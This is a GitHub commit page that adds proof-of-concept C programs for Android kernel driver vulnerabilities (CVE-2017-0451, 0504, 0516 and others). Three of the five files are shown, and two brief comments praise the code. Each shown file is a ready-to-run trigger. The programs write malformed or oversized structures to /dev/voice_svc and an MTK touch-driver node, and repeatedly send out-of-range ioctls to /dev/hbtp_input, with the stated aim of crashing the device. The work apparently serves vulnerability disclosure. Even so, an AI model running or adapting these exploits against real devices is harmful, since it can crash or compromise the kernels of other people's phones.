Permalink
Browse files

CVE-2017-0451

CVE-2017-0504
CVE-2017-0516
CVE-2017-0518
CVE-2017-0519
CVE-2017-0521

Signed-off-by: Scott Bauer <sbauer@plzdonthack.me>
  • Loading branch information...
ScottyBauer committed Mar 18, 2017
1 parent 21d9ce8 commit a9e71a13034d283d9bf0fb909039e99285c6db89
Showing with 870 additions and 0 deletions.
  1. +33 −0 CVE-2017-0451.c
  2. +61 −0 CVE-2017-0504_mtk.c
  3. +63 −0 CVE-2017-0516.c
  4. +281 −0 CVE-2017-0518_0519.c
  5. +432 −0 CVE-2017-0521.c
View
@@ -0,0 +1,33 @@
+#include <stdlib.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+
+#define MSG_REGISTER 0x1
+#define MSG_REQUEST 0x2
+#define MSG_RESPONSE 0x3
+
+struct voice_svc_write_msg {
+ uint32_t msg_type;
+ uint8_t payload[0];
+};
+
+
+int main(void) {
+ int fd;
+ struct voice_svc_write_msg msg = { 0 };
+ msg.msg_type = MSG_REGISTER;
+ msg.payload[0] = 0xff;
+ fd = open("/dev/voice_svc", O_WRONLY);
+ if (fd > 0) {
+ write(fd, &msg, sizeof(msg));
+ }
+ else
+ printf("Error on /dev/voice_svc with %s\n", strerror(errno));
+
+ close(fd);
+ }
+
View
@@ -0,0 +1,61 @@
+#include <stdlib.h>
+#include <stdio.h>
+#include <unistd.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <limits.h>
+#include <inttypes.h>
+
+typedef uint8_t u8;
+typedef uint16_t u16;
+
+#pragma pack(1)
+typedef struct {
+ u8 wr; /* write read flag 0:R 1:W 2:PID 3: */
+ u8 flag; /* 0:no need flag/int 1: need flag 2:need int */
+ u8 flag_addr[2]; /* flag address */
+ u8 flag_val; /* flag val */
+ u8 flag_relation; /* flag_val:flag 0:not equal 1:equal 2:> 3:< */
+ u16 circle; /* polling cycle */
+ u8 times; /* plling times */
+ u8 retry; /* I2C retry times */
+ u16 delay; /* delay befor read or after write */
+ u16 data_len; /* data length */
+ u8 addr_len; /* address length */
+ u8 addr[2]; /* address */
+ u8 res[3]; /* reserved */
+ u8 *data; /* data pointer */
+} st_cmd_head;
+#pragma pack()
+
+
+
+int main(int argc, char **argv)
+{
+ st_cmd_head cmd_head = { 0 };
+ int fd;
+
+ if (argc < 2) {
+ printf("Please provide a location to the entry. "\
+ "it should start with the name 'gmnode' then a date "\
+ "After.\n");
+ return EXIT_FAILURE;
+ }
+
+ fd = open(argv[1], O_RDWR);
+
+ if (fd < 0) {
+ printf("Couldn't open %s with error %s\n", argv[1], strerror(errno));
+ return EXIT_FAILURE;
+ }
+
+ cmd_head.wr = 15;
+ cmd_head.data_len = 65534;
+
+ write(fd, &cmd_head, sizeof(cmd_head));
+
+ printf("Write completed? Probably should be rebooting now\n");
+ return EXIT_FAILURE;
+}
View
@@ -0,0 +1,63 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/ioctl.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <stdbool.h>
+#include <errno.h>
+#include <string.h>
+
+static const char *dev = "/dev/hbtp_input";
+
+struct hbtp_input_absinfo {
+ bool active;
+ uint16_t code;
+ int32_t minimum;
+ int32_t maximum;
+};
+
+
+#define HBTP_INPUT_IOCTL_BASE 'T'
+#define HBTP_SET_ABSPARAM _IOW(HBTP_INPUT_IOCTL_BASE, 201, \
+ struct hbtp_input_absinfo *)
+
+#define ABS_MT_TOUCH_MAJOR 0x30 /* Major axis of touching ellipse */
+#define ABS_MT_TOUCH_MINOR 0x31 /* Minor axis (omit if circular) */
+#define ABS_MT_TOOL_Y 0x3d /* Center Y tool position */
+
+#define ABS_MT_FIRST ABS_MT_TOUCH_MAJOR
+#define ABS_MT_LAST ABS_MT_TOOL_Y
+
+
+static int getfd(const char* dev_node)
+{
+ int fd;
+ fd = open(dev_node, O_RDWR);
+ if (fd < 0) {
+ fprintf(stderr, "Couldn't open devnode %s with error %s\n", dev_node, strerror(errno));
+ exit(EXIT_FAILURE);
+ }
+
+ return fd;
+}
+
+
+int main(void)
+{
+ int i;
+ struct hbtp_input_absinfo absinfo[ABS_MT_LAST - ABS_MT_FIRST + 1] = { 0 };
+ int fd = getfd(dev);
+
+ for (i = 0; i < ABS_MT_LAST - ABS_MT_FIRST + 1; i++) {
+ absinfo[i].active = 1;
+ absinfo[i].code = 0xFFFF - i;
+ absinfo[i].minimum = 0xAAAAAAAA;
+ absinfo[i].maximum = 0xAAAAAAAA;
+ }
+
+ while(true) {
+ ioctl(fd, HBTP_SET_ABSPARAM, absinfo);
+ }
+
+}
Oops, something went wrong.

2 comments on commit a9e71a1

@Josue198s

This comment has been minimized.

Show comment
Hide comment
@Josue198s

Josue198s Mar 20, 2017

Nice and clean code, but more comments are need.

Nice and clean code, but more comments are need.

@omicr0

This comment has been minimized.

Show comment
Hide comment

nice

Please sign in to comment.